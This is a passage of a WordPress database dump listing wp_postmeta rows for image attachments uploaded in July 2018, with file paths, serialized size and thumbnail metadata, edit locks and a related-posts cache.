(7676, 3337, '_wp_attached_file', '2018/07/9-7-2561-8-46-13.jpg'),
(7677, 3337, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:195;s:6:\"height\";i:245;s:4:\"file\";s:28:\"2018/07/9-7-2561-8-46-13.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"9-7-2561-8-46-13-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7678, 3338, '_wp_attached_file', '2018/07/9-7-2561-8-46-36.jpg');
INSERT INTO `wp_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(7679, 3338, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:582;s:6:\"height\";i:159;s:4:\"file\";s:28:\"2018/07/9-7-2561-8-46-36.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"9-7-2561-8-46-36-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"9-7-2561-8-46-36-300x82.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:82;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:28:\"9-7-2561-8-46-36-400x109.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:109;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7680, 3339, '_wp_attached_file', '2018/07/9-7-2561-8-47-45.jpg'),
(7681, 3339, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:565;s:6:\"height\";i:347;s:4:\"file\";s:28:\"2018/07/9-7-2561-8-47-45.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"9-7-2561-8-47-45-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"9-7-2561-8-47-45-300x184.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:28:\"9-7-2561-8-47-45-400x246.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:246;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7682, 3336, '_hide_featured', NULL),
(7683, 3342, '_edit_lock', '1531124747:3'),
(7684, 3342, '_edit_last', '3'),
(7685, 3343, '_wp_attached_file', '2018/07/9-7-2561-15-23-22.jpg'),
(7686, 3343, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:191;s:6:\"height\";i:240;s:4:\"file\";s:29:\"2018/07/9-7-2561-15-23-22.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"9-7-2561-15-23-22-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7687, 3344, '_wp_attached_file', '2018/07/9-7-2561-15-23-33.jpg'),
(7688, 3344, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:579;s:6:\"height\";i:154;s:4:\"file\";s:29:\"2018/07/9-7-2561-15-23-33.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"9-7-2561-15-23-33-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"9-7-2561-15-23-33-300x80.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:80;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"9-7-2561-15-23-33-400x106.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:106;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7689, 3345, '_wp_attached_file', '2018/07/9-7-2561-15-24-04.jpg'),
(7690, 3345, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:840;s:6:\"height\";i:334;s:4:\"file\";s:29:\"2018/07/9-7-2561-15-24-04.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"9-7-2561-15-24-04-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"9-7-2561-15-24-04-300x119.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:119;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"9-7-2561-15-24-04-768x305.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:305;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"9-7-2561-15-24-04-400x159.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:159;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7691, 3342, '_hide_featured', NULL),
(7692, 3348, '_edit_lock', '1531125815:3'),
(7693, 3348, '_edit_last', '3'),
(7694, 3349, '_wp_attached_file', '2018/07/9-7-2561-15-41-31.jpg'),
(7695, 3349, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:195;s:6:\"height\";i:240;s:4:\"file\";s:29:\"2018/07/9-7-2561-15-41-31.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"9-7-2561-15-41-31-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7696, 3350, '_wp_attached_file', '2018/07/9-7-2561-15-42-02.jpg'),
(7697, 3350, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:582;s:6:\"height\";i:154;s:4:\"file\";s:29:\"2018/07/9-7-2561-15-42-02.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"9-7-2561-15-42-02-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"9-7-2561-15-42-02-300x79.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:79;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"9-7-2561-15-42-02-400x106.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:106;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7698, 3351, '_wp_attached_file', '2018/07/9-7-2561-15-43-45.jpg'),
(7699, 3351, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:765;s:6:\"height\";i:318;s:4:\"file\";s:29:\"2018/07/9-7-2561-15-43-45.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"9-7-2561-15-43-45-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"9-7-2561-15-43-45-300x125.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:125;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"9-7-2561-15-43-45-400x166.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:166;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7700, 3348, '_hide_featured', NULL),
(7701, 3354, '_edit_lock', '1531126593:3'),
(7702, 3354, '_edit_last', '3'),
(7703, 3355, '_wp_attached_file', '2018/07/9-7-2561-15-58-20.jpg'),
(7704, 3355, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:195;s:6:\"height\";i:239;s:4:\"file\";s:29:\"2018/07/9-7-2561-15-58-20.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"9-7-2561-15-58-20-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7705, 3356, '_wp_attached_file', '2018/07/9-7-2561-15-58-59.jpg'),
(7706, 3356, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:634;s:6:\"height\";i:316;s:4:\"file\";s:29:\"2018/07/9-7-2561-15-58-59.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"9-7-2561-15-58-59-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"9-7-2561-15-58-59-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"9-7-2561-15-58-59-400x199.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:199;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7707, 3357, '_wp_attached_file', '2018/07/9-7-2561-15-59-21.jpg'),
(7708, 3357, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:582;s:6:\"height\";i:153;s:4:\"file\";s:29:\"2018/07/9-7-2561-15-59-21.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"9-7-2561-15-59-21-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"9-7-2561-15-59-21-300x79.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:79;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"9-7-2561-15-59-21-400x105.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:105;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7709, 3354, '_hide_featured', NULL),
(7710, 3360, '_edit_lock', '1531126888:3'),
(7711, 3360, '_edit_last', '3'),
(7712, 3332, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575605600;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4182;}i:1;a:1:{s:2:\"id\";i:4863;}i:2;a:1:{s:2:\"id\";i:6176;}}}}'),
(7713, 3362, '_edit_lock', '1531191006:3'),
(7714, 3362, '_edit_last', '3'),
(7715, 3363, '_wp_attached_file', '2018/07/36889500_620926668283525_8491488229269176320_n.jpg'),
(7716, 3363, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:960;s:6:\"height\";i:720;s:4:\"file\";s:58:\"2018/07/36889500_620926668283525_8491488229269176320_n.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"36889500_620926668283525_8491488229269176320_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"36889500_620926668283525_8491488229269176320_n-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"36889500_620926668283525_8491488229269176320_n-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"36889500_620926668283525_8491488229269176320_n-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7717, 3362, '_thumbnail_id', '3363'),
(7721, 3362, '_hide_featured', NULL),
(7722, 3362, '_wpas_done_all', '1'),
(7723, 3366, '_edit_lock', '1531188535:3'),
(7724, 3366, '_edit_last', '3'),
(7725, 3367, '_wp_attached_file', '2018/07/36828566_621031098273082_1240391721930457088_o.jpg'),
(7726, 3367, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1478;s:6:\"height\";i:1108;s:4:\"file\";s:58:\"2018/07/36828566_621031098273082_1240391721930457088_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"36828566_621031098273082_1240391721930457088_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"36828566_621031098273082_1240391721930457088_o-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"36828566_621031098273082_1240391721930457088_o-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"36828566_621031098273082_1240391721930457088_o-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"36828566_621031098273082_1240391721930457088_o-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7727, 3366, '_thumbnail_id', '3367'),
(7731, 3366, '_hide_featured', NULL),
(7732, 3366, '_wpas_done_all', '1'),
(7737, 3373, '_wp_attached_file', '2018/07/10-7-2561-9-53-19.jpg'),
(7738, 3373, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:194;s:6:\"height\";i:243;s:4:\"file\";s:29:\"2018/07/10-7-2561-9-53-19.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"10-7-2561-9-53-19-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7739, 3374, '_wp_attached_file', '2018/07/10-7-2561-9-53-50.jpg'),
(7740, 3374, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:967;s:6:\"height\";i:629;s:4:\"file\";s:29:\"2018/07/10-7-2561-9-53-50.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"10-7-2561-9-53-50-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"10-7-2561-9-53-50-300x195.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:195;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"10-7-2561-9-53-50-768x500.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"10-7-2561-9-53-50-400x260.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7741, 3375, '_wp_attached_file', '2018/07/10-7-2561-9-54-45.jpg'),
(7742, 3375, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:580;s:6:\"height\";i:155;s:4:\"file\";s:29:\"2018/07/10-7-2561-9-54-45.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"10-7-2561-9-54-45-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"10-7-2561-9-54-45-300x80.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:80;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"10-7-2561-9-54-45-400x107.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:107;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7743, 3326, '_hide_featured', NULL),
(7744, 3379, '_wp_attached_file', '2018/07/10-7-2561-10-06-54.jpg'),
(7745, 3379, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:581;s:6:\"height\";i:158;s:4:\"file\";s:30:\"2018/07/10-7-2561-10-06-54.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"10-7-2561-10-06-54-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"10-7-2561-10-06-54-300x82.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:82;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"10-7-2561-10-06-54-400x109.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:109;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7746, 3382, '_wp_attached_file', '2018/07/145623013221.jpg'),
(7747, 3382, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:579;s:6:\"height\";i:158;s:4:\"file\";s:24:\"2018/07/145623013221.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"145623013221-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"145623013221-300x82.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:82;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:24:\"145623013221-400x109.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:109;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7748, 3383, '_wp_attached_file', '2018/07/10-7-2561-10-25-00.jpg'),
(7749, 3383, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:780;s:6:\"height\";i:645;s:4:\"file\";s:30:\"2018/07/10-7-2561-10-25-00.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"10-7-2561-10-25-00-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"10-7-2561-10-25-00-300x248.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:248;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"10-7-2561-10-25-00-768x635.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:635;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"10-7-2561-10-25-00-363x300.jpg\";s:5:\"width\";i:363;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
